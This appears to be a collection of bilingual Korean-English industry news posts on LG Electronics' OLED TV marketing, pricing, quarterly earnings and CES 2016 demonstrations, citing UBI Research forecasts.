한편 LG전자 Home Entertainment 사업부는 지난 4분기 유럽, 러시아, 북미 등 주요 시장에서 출하량을 증가하며 4.74조원의 매출액 기준 전분기 대비 11%, 영업이익률도 0.9%에서 2.3%로 성장하였다.

LG전자 실적 발표회

[CES 2016]LGE OLED Cinema

LG Elec.의 부스 중 55인치, 65인치, 77인치 OLED TV를 약 200여대 이용해 LG OLED TV의 real black 구현을 가장 잘 표현한 공간이었다.

[CES 2016]LGE Dual-View Curved Tiling OLED

LG Elec.이 55인치 curved OLED 패널을 세로면이 닿게 8개를 붙여 앞뒤로 4장씩 볼 수 있게 전시하였다.

[CES 2016]LGE Press Conference

LG Elec. press conference를 열어 초프리미엄 제품군 LG시그니처를 소개하고 그 중 OLED TV의 우수성을 강조하였다.

올레드 TV, 차세대 방송기술로 HDR 방송 시연

LG OLED TV, source: LG전자

LG전자가 차세대 방송 기술 기반의 HDR(High Dynamic Range, 이하 HDR) 방송을 시연한다.

LG전자는 6일 미국 라스베이거스에서 열리는 세계 최대 가전전시회 ‘CES 2016’에서 LG 올레드 TV로 차세대 방송 표준규격인 ATSC 3.0(Advanced Television System Committee 3.0) 기반의 HDR 방송을 실시간으로 송수신하는 기술을 선보인다.

LG전자는 북미 LG 제니스 연구소, 방송장비업체 ‘게이츠에어(GatesAir)’와 공동으로 라스베이거스 지역 방송사의 송신탑에서 송출된 HDR 방송을 LG 올레드 TV로 수신한다.

한국과 미국에서 울트라HD 방송 표준으로 ATSC 3.0이 유력하게 거론되고 있는 만큼, LG전자는 이번 HDR 방송 시연을 통해 차세대 방송 기술에서도 우위를 선점한다는 계획이다.

LG전자는 이번 전시회에서 차세대 방송 표준 규격과 관련해 한 발 앞선 기술력을 선보인다. 이번 시연에서 소개하는 루트(ROUTE, Real-time Object delivery over Unidirectional Transport)는 LG전자가 주도해 개발한 인터넷 IP기반의 방송 전송 기술로 ATSC 3.0의 핵심 표준기술이다. 루트 기술은 실시간 방송은 물론 방송안내정보(ESG: Electronic Service Guide) 등 부가 서비스 정보도 전달할 수 있다.

ATSC 3.0은 주파수를 효율적으로 운영할 수 있기 때문에 영상 정보 외에 부가 정보들을 더 많이 전송할 수 있다. 영상 정보와 부가 정보가 서로 다른 규격으로 지상파와 인터넷망을 통해 각각 송출되던 기존 방식과는 달리, ATSC 3.0은 모든 방송 정보를 인터넷 IP 기반으로 주고 받기 때문에 방송과 인터넷을 융합한 서비스에도 적합하다. 예를 들어 기존에는 방송 신호가 약한 곳에서는 스마트폰으로 DMB 방송을 볼 수 없었지만, ATSC 3.0 기술을 이용하면 방송 신호가 약한 곳에서는 무선 인터넷망으로 전환되기 때문에 끊김 없이 자연스러운 영상을 즐기는 게 가능하다.

HDR는 어두운 부분을 더욱 어둡게, 밝은 부분을 더욱 밝게 보여주기 때문에 한층 또렷하고 생생한 화면을 구현하는 기술이다.

LG 올레드 TV는 백라이트가 없어 완벽한 블랙을 구현하기 때문에 규격과 장르를 불문하고 어떠한 영상에서도 HDR 효과를 극대화해 표현할 수 있다.

HDR 기술이 울트라HD 방송에서 구현되면, 시청자들은 초고해상도로 한층 생동감 넘치는 화면을 즐길 수 있다. 이 때문에 전 세계 방송 관련 기업들은 차세대 울트라HD 방송 표준에 HDR를 적용하는 기술을 적극적으로 연구하고 있다.

LG전자 최고기술책임자(CTO) 안승권 사장은 “차세대 방송기술을 선도해 시청자들에게 차원이 다른 화질을 선사할 것”이라고 강조했다.

 

출처:LG전자

The Opening of OLED TV Market, Starts Now

On November 25, LG Electronics and LG Display announced that they are planning to reveal OLED sculptures in various shapes such as tunnel, waves, cylinder, and others using 250 units of 55inch OLED panels at N Seoul Tower in South Korea. The sculptures will screen diverse contents with artistic merit and provide extraordinary spectacle while advertising OLED’s astonishing picture quality.

 

This N Seoul Tower OLED sculpture installation is the second OLED signage that LG Electronics revealed to the public; on November 19, LG Electronics installed ‘OLED Moment’, a supersize OLED signage, in 2 locations in Incheon International Airport and held a completion ceremony.

 

LG Electronics is aiming to lead the OLED TV market through 2 track strategy of OLED TV price reduction and OLED promotion. At the Q2 performance announcement, they revealed their plan for aggressive marketing through OLED promotion. The successive OLED sculpture installation can be seen as a part of LG Electronics’ OLED promotion strategy.

 

This strategy is analyzed to be fairly effective. On November 3, LG electronics revealed that the October sales figure was 4,500 units which is more than twice the amount sold in the beginning of the year. At the same time, OLED TV is continually falling down. 55inch UHD OLED TV, which was priced around US$ 3,000 on amazon.com in September, fell to the current around US$ 2,000.

 

Japan’s Panasonic revealed their plan to actively sell UHD OLED TV from 2016. China’s companies including Skyworth, Changhong, Hisense, and Konka are intending to present or release OLED TV.

 

With LG’s aggressive OLED TV marketing and the increase of OLED TV selling companies, the industry’s attention is on the future OLED TV market’s growth. According to UBI Research, OLED TV market is estimated to grow and record approximately 17 million units in 2020.

 

LG's OLED Tunnel to be Installed in N Seoul Tower, LG Electronics

LG’s OLED Tunnel to be Installed in N Seoul Tower, LG Electronics

OLED TV시장 개화, 이제부터다

LG전자와 LG디스플레이는 25일 남산 서울타워에 55인치 OLED 패널 250장을 사용한 터널형, 물결형, 원통형 등의 조형물을 공개하겠다고 발표하며 예술성을 갖춘 다양한 컨텐츠를 상영하며 OLED의 압도적인 화질을 알리는 동시에 이색적인 볼거리를 제공할 계획이라고 밝혔다.

이번 남산 서울 타워 OLED 조형물 설치는 LG전자가 일반인에게 공개한 두 번째 OLED 사이니지로 지난 19일 LG전자는 인천공항 두 곳에 각각 초대형 OLED 사이니지인 ‘OLED Moment’를 설치하고 19일 준공식을 열었었다.

LG전자는 OLED TV 가격 하락과 OLED 알리기라는 2가지의 전략으로 OLED TV 시장 선도라는 목표를 이루려고 하고 있다. 특히 지난 2분기 실적발표회에서 OLED 알리기를 전면에 내세우는 전략을 통해 공격적인 마케팅을 펼치겠다고 밝힌 바 있다. 잇따른 OLED 조형물 설치는 LG전자의 OLED 알리기 전략의 일환으로 볼 수 있다.

이런 전략은 현재 어느 정도 효과를 거두고 있는 것으로 분석된다. 지난 3일 LG전자에서 10월 판매량이 연초 대비 2배 이상 늘어난 4,500대를 돌파했다고 밝혔다. 동시에 OLED TV에 대한 가격하락도 지속적으로 이루어지고 있다. 아마존 기준 55inch UHD OLED TV는 9월 US$3,000의 가격대에서 현재 US$2,000의 가격대로 하락한 상태이다.

일본의 Panasonic은 UHD OLED TV를 2016년부터 본격적으로 일본에 판매할 계획을 밝혔으며, 중국의 Skyworth와 Changhong, Hisense, Konka 등도 OLED TV를 내놓거나 출시할 예정이다.

이와 같이 LG의 공격적인 OLED TV 마케팅과 LG 전자 이외의 OLED TV 판매업체가 늘어나고 있어 앞으로의 OLED TV 시장의 성장세에 업계의 관심이 쏠리고 있다.

한편 유비산업리서치에 따르면 OLED TV 시장은 2020년에 약 1,700만대의 규모로 성장할 것이라 밝혔다.

 

남산타워에 설치될 LG의 OLED 터널, LG전자

남산타워에 설치될 LG의 OLED 터널, LG전자

LG OLED TV Records Highest Monthly Sales Volume

LG Electronics’ strategy of OLED promotion and OLED TV price reduction appears to be working successfully.

 

On November 3, LG Electronics reported that the October sales exceeded 4,500 units, twice the volume of early 2015. Particularly, the sales volume of the first week of October exceeded 2,000 units and contributed to breaking the monthly sales volume record.

 

The OLED TV’s bigger price drops from the last week of September seem to have led the high sales volume in the first week of October. According to Amazon, 55inch FHD curved OLED TV fell to US$ 1,797 from October, approximately a 28% drop from August’s US$ 2,499. 55inch UHD curved OLED TV and UHD flat OLED TV also fell to the US$ 2,000 range, making the price difference with UHD LCD TV to be US$ 500. This price competitiveness is analyzed to contribute to the increased sales volume.

 

Aggressive marketing is also a factor for this sales volume growth. In September, LG Electronics installed OLED TV in 39 key airports in 23 countries including the US, Germany, and Russia, and revealed plan to install approximately 200 units of OLED TV until the end of October. Advertisement of OLED TV can also be easily seen in Korean subway stations. LG Electronics’ OLED promotion strategy, revealed during the Q2 performance announcement appears to be effective.

 

Recently, LG Electronics announced their aim to lead the OLED TV market through strengthening OLED=LG image and OLED TV and UHD TV product diversification.

 

 

LG 55inch OLED TV Price Changes

LG 55inch OLED TV Price Changes

LG OLED TV, 월간 판매량 최대치 경신

LG전자의 OLED TV 가격 하락과 OLED 알리기 전략이 성공적으로 진행되고 있는 것으로 보인다.

LG전자는 10월 판매량이 연초 대비 2배 이상 늘어난 4,500대를 돌파했다고 3일 밝혔다. 특히 10월 첫 주 판매량이 2,000대를 상회하면서 월 판매량 기록을 경신했다.

OLED TV는 9월 마지막 주부터 가격 하락폭이 커지면서 10월 첫 주에 높은 판매량을 기록한 것으로 보인다. 미국의 인터넷 소매 사이트인 아마존 기준에55인치 FHD curved OLED TV는 10월부터 $ 1,797로 8월 $ 2,499에 비해 약 28% 하락했다. 55인치 UHD curved OLED TV와 UHD flat OLED TV도 $ 2,000 대로 떨어져 UHD LCD TV와 $ 500 차이로 가격 경쟁력을 갖춰 판매량이 늘어난 것으로 분석된다.

공격적인 마케팅도 판매량 상승의 요인으로 꼽힌다. LG전자는 지난 9월 미국, 독일, 러시아 등 23개국 39개 주요 공항에 OLED TV를 설치하고 10월 말까지 200여 대의 OLED TV를 설치하겠다는 계획을 밝혔다. 또한 국내 지하철 역에서 OLED TV 광고를 쉽게 접할 수 있다. 이처럼 LG전자가 지난 2분기 실적발표회에서 밝힌 OLED 알리기 전략이 점점 성과를 내고 있는 것으로 보인다.

한편 LG전자는 OLED TV와 UHD TV의 제품 다양화를 통해 OLED=LG라는 이미지 구축에 더욱 힘을 주겠다고 발표해 OLED TV 시장의 선도하겠다는 목표를 밝힌 바 있다.

LG 55인치 OLED TV 가격 변화 추이

LG Electronics Strives to Establish OLED=LG Image

On October 29, during the performance announcement, LG Electronics revealed their plan to carry out aggressive marketing through establishment of OLED=LG image.

 

LG Electronics Home Entertainment business reported that the TV shipment doubled in this quarter compared its previous quarter due to OLED TV and UHD TV product mix. LG Electronics reported that OLED TV market expansion from Korea and North America into Europe and Russia among others contributed to the sales increase.

 

LG Electronics is anticipating sales increase in Q4 from peak TV market and general market promotion brought premium TV sales expansion. Accordingly, LG Electronics forecast their Q4 sales to be similar to 2014 and that business profit to increase slightly due to improvement in TV’s profit stabilization.

 

Regarding aggressive marketing from Chinse TV companies including Hisense, and TCL, Jinho Ha of LG Electronics Home Entertainment planning department, admitted the threat. However, through premium TV technology such as smart TV, design, and OLED, Ha explained that they will secure product superiority. He also added that Chinse companies’ North American TV market share is around 3% in terms of volume and remains minimal in revenue.

 

New premium OLED TV release brought better than expected response from consumers. It is also receiving positive reviews; several media have selected the product as this year’s TV. The company reported that they will strive to expand the market through extension from the premium TV.

 

LG Electronics’ total revenue was announced to be 13,000 million USD* with business profit of 270 million USD. Home Entertainment department reported 4,000 million USD, a 9% increase from previous quarter, with business profit of 33 million USD.

 

* 1 USD = 1,100 KRW

LG전자, OLED=LG 이미지 구축에 힘쓴다

LG전자가 29일 여의 트윈타워에서 열린 실적발표회에서 OLED=LG라는 이미지 구축으로 공격적인 마케팅을 펼칠 계획을 밝혔다.

LG전자 HE사업부는 이번 3분기에 OLED TV와 UHD TV의 제품 믹스로 TV 출하량이 전분기 대비 2배 증가했다고 발표했다. 또한 한국, 북미 중심의 판매 시장에서 유럽, 러시아 등의 OLED TV 시장 확대도 매출 증가의 요인으로 꼽았다.

LG전자는 TV 시장 성수기와 시장 전체 프로모션을 통한 프리미엄 TV 판매 확대로 4분기 매출의 상승을 기대하고 있다. 이에 LG전자의 4분기 매출액은 전년과 유사할 것으로 전망했으며, 영업이익은 TV의 수익 안정화 개선으로 소폭 상승할 것으로 내다봤다.

LG전자 HE기획관리 하진호 상무는 하이센스, TCL 등 중국 업체의 공격적인 마케팅에 대해 ‘중국 TV업체가 위협적인 것은 사실이다’라며 ‘스마트 TV, 디자인, OLED 등의 프리미엄 TV 기술력으로 제품군 우위를 확보해 나갈 것’이라고 설명했다. 현재 중국 업체의 북미 TV 시장 점유율은 수량 기준 3% 대이고, 매출액 기준으로는 미미한 수준이라고 덧붙였다.

또한 OLED TV의 선신 시장에서 프리미엄 신모델 출시가 소비자 반응이 기대 이상이며 여러 평가 매체에서 올해의 TV로 선정하는 등 호의적인 평가를 받고 있다고 밝혔다. 이에 프리미엄의 위치에서 시장을 확대해 나가는 전략으로 시장 확대에 힘쓰겠다고도 말했다.

한편 LG전자의 전사 매출액은 14조288억원, 영업이익은 2940억원을 기록했고, HE사업부는 전분기 대비 9% 성장한 4조2864억원, 영업이익은 370억원으로 발표했다.

LG Electronics’ OLED TV, Increasingly Competitive in Price

OLED TV price, which was considered the biggest issue compared to LCD TV, has fallen once again. LG Electronics’ 2015 new model 65inch 4K Ultra HD curved OLED TV (65EG9600) is now priced US$ 5,999 on Amazon (www.amazon.com). The price that used to be US$ 8,999 even in June fell to US$ 6,999 in July, and it is now down to US$ 5,999, showing rapid decrease. Furthermore, the price decrease is not limited to 65inch products as 55inch 4K Ultra HD curved OLED TV (55EG9600) also fell by US$ 1,000, from US$ 4,999 to US$ 3,999.

 

There is a difference of US$ 1,500 in price between LG Electronics’ 65inch 4K OLED TV and Samsung Electronics’ premium model 65inch 4K SUHD TV (US$ 4,499). Analysis shows that the monthly average price decrease for OLED TV between June and August is 18% while SUHD TV’s is 5%.

 

During the last earnings results announcement, LG Electronics reported that UHD OLED TV will achieve price competitiveness in 2016. If the price decrease continues at this rate, OLED TV will be able to aim for market expansion against LCD TV through price as well as its many advantages such as design freedom, thickness, and picture quality.

 

LG Electronics reduced the price of 55inch Full HD curved OLED TV (55EC9300), released last year, from US$ 2,499 to US$ 1,999.

150827_LG전자의 OLED TV, 가격 경쟁력 점점 모습을 드러내나

LG전자의 OLED TV, 가격 경쟁력 점점 모습을 드러내나

LCD TV와 가격 경쟁력이 가장 큰 문제로 대두되었던 OLED TV의 가격이 또 한번 하락했다. 미국의 인터넷 소매점 아마존(www.amazon.com)에서 LG전자의 2015년 신모델인 65inch 4K Ultra HD curved OLED TV(65EG9600) 가격을 US$ 5,999로 공시했다. 이전 6월까지만 해도 US$ 8,999였던 가격이 지난 7월 US$ 6,999까지 내려간 데에 이어 US$ 5,999로 빠른 하락세를 보이고 있다. 65inch급 제품뿐만 아니라 55inch 4K Ultra HD curved OLED TV(55EG9600)도 기존 US$ 4,999에서 US$ 3,999로 US$ 1,000의 하락폭을 보였다.

삼성전자의 프리미엄 모델인 65inch급 4K SUHD TV 가격이 US$ 4,499로 LG전자의 65inch급 4K OLED TV와 US$ 1,500의 가격 차이가 나는 것으로 나타났다. 지난 6월부터 8월까지 월평균 가격 하락률이 18%인 OLED TV에 비해 SUHD TV는 5%로 분석되었다.

LG전자는 지난 실적 설명회에서 2016년에 UHD OLED TV 제품의 가격 경쟁력을 갖출 것이라고 발표했다. 지금과 같은 하락폭이 지속된다면 내년 상반기에는 LCD TV와 가격을 포함해 자유로운 디자인, 두께, 화질의 장점을 통해 시장 확대를 노릴 수 있을 것으로 예상된다.

또한, LG전자는 작년에 공개한 55inch Full HD curved OLED TV(55EC9300)의 가격을 US$ 2,499에서US$ 1,999로 내렸다.

 

LGE to Compete with UHD OLED TV Price in 2016

On July 29, LG Electronics announced its earnings results at LG Twin Towers in Yeouido, South Korea. Representatives of each business departments, including LGE’s CFO Jung Do Hyun, explained the second quarter results and third quarter outlook.

 

Regarding the poor sales results of this quarter, LGE gave the decrease in sales and business profit in most of the growth market as the reason. The decrease was analyzed to be from sudden fluctuations in foreign exchange rate which led to global economic downturn. Essentially, it seems LGE believes that their market strategy is not at fault and that the decrease in demand in TV market and weaker global foreign exchange rate led to the fall in profit.

 

The competitiveness of Home Entertainment (HE) business department increased through strengthening product mix focusing on premium products. However, due to the sudden fluctuations in foreign exchange rate and seasonal factors the global market diminished and an 11% decrease in sales was recorded compared to the previous quarter. Jung explained that the sales in Europe, Central and South America, and Russia increased but most of the growth market showed economic downturn due to weak foreign exchange rate which led to the decrease in sales. However, he forecast that in the third quarter, the premium TV market will continue to grow and increase the UHD OLED TV sales.

 

Additionally, Jung commented while low-to-medium priced products will be released, sales activity will focus on premium products and announced as the yield of UHD OLED TV panel is increasing rapidly, they will be able to compete in price from mid-2016. He also made a positive estimation that the market will show a growth rate once the foreign exchange rate fluctuations stabilize.

 

According to UBI Research, there is approximately US$ 2,000 prices difference between UHD OLED TV and SUHD TV, looking at 55inch size in early July. Within less than a month, on July 24, the difference was reduced to US$ 1,700; it is estimated that UHD OLED TV will be able to compete against SUHD TV price from next year.

 

Answering a question on competition with Chinese companies, LGE clarified that although their growth is rapid, LGE is ahead in terms of patents, quality, and brand power. Although they mentioned that Chinse companies have growth foothold with their large market share within domestic market in China, LGE concluded that the real global growth is not very great. However, LGE admitted that Chinse companies are definitely superior in cost effectiveness. To combat this, LGE announced they will focus on premium products and increase competitiveness, and form strategy of supplying non-premium products to the growth market.

 

LGE recorded sales of approximately US$ 1,600,000,000, a 0.5% decrease from the previous quarter, and business profit of approximately US$ 200,000,000, a 20% decrease from the previous quarter.

LGE, 2016년 UHD OLED TV 가격으로 승부

여의도 LG트윈타워에서 7월 29일 오후4시부터 LG전자의 실적설명회가 있었다. LG전자의 정도현 CFO를 비롯한 각 사업부문별 대표자들은 2분기 실적과 3분기 전망에 대해 설명했다.

이번 분기 매출 실적 부진에 대해서 환율의 급격한 변동이 글로벌 경제 침체를 불렀고 대부분의 성장 시장에서 매출과 영업이익 축소를 이유로 들었다. 다시 말해 LG전자의 시장 전략은 문제나 차질이 없다고 판단되나 TV 시장의 수요 감소와 글로벌 환율 약세가 수익성 하락에 대한 공식적인 입장이다.

HE 사업부는 프리미엄 제품을 중심으로 제품mix를 강화하여 경쟁력은 올라갔지만 급변하는 환율과 계절적인 요인으로 인해 글로벌 시장이 위축되면서 전분기 대비 11% 매출이 하락했다. 이에 LG전자의 정도현 CFO는 ‘유럽, 중남미, 러시아 시장은 매출이 올랐지만 대부분의 성장시장이 환율 약세로 인한 경제적 위축이 되면서 매출이 하락한 것으로 보인다’라고 말했다. 하지만 3분기에는 프리미엄 TV 시장의 성장세가 지속되어 UHD OLED TV의 매출이 오를 것으로 전망하였다.

또한 정도현 CFO는 ‘중저가 제품도 출시를 하겠지만 프리미엄 제품을 중점적으로 판매 활동을 할 것이며, UHD OLED TV panel의 수율이 빠르게 오르고 있어 내년 중반부터는 가격경쟁력을 가질 수 있다’고 발표했다. ‘환율의 급격한 변동이 안정화 되면 시장이 다시 성장세를 띌 것’이라는 긍정적인 전망을 내놓았다.

유비산업리서치에 따르면 UHD OLED TV는 SUHD TV와 7월 초 55인치 기준으로 약 $2,000 가량 차이가 나고 있다. 아직 한 달이 채 안된 7월 24일 기준으로는 $1,700로 빠르게 줄어들면서 내년부터는 SUHD TV와 가격 경쟁이 가능할 것으로 전망된다.

중국 업체들의 경쟁에 대한 질문에 대해서는 성장이 빠르다는 것은 인정하나 특허나 품질, 브랜드 가치 등에서 우위가 있다고 답했다. 중국 내수 시장의 점유가 커서 성장 발판이 있다고 말하면서 실질적인 글로벌 성장은 크지 않다고 판단했다. 다만 가성비적인 측면에서는 확실히 우위에 있다고 답변했다. 이에 대한 LG전자는 프리미엄 제품에 집중하여 경쟁력을 높일 것이며 성장 시장에서는 보급형 제품을 공급하는 전략을 수립할 것으로 발표했다.

LG전자는 전분기 대비 0.5% 하락한 13조 9300억원의 매출을 기록했고, 영업이익은 2,441억원으로 전분기 대비 20% 하락한 수치이다.

Portfolio Items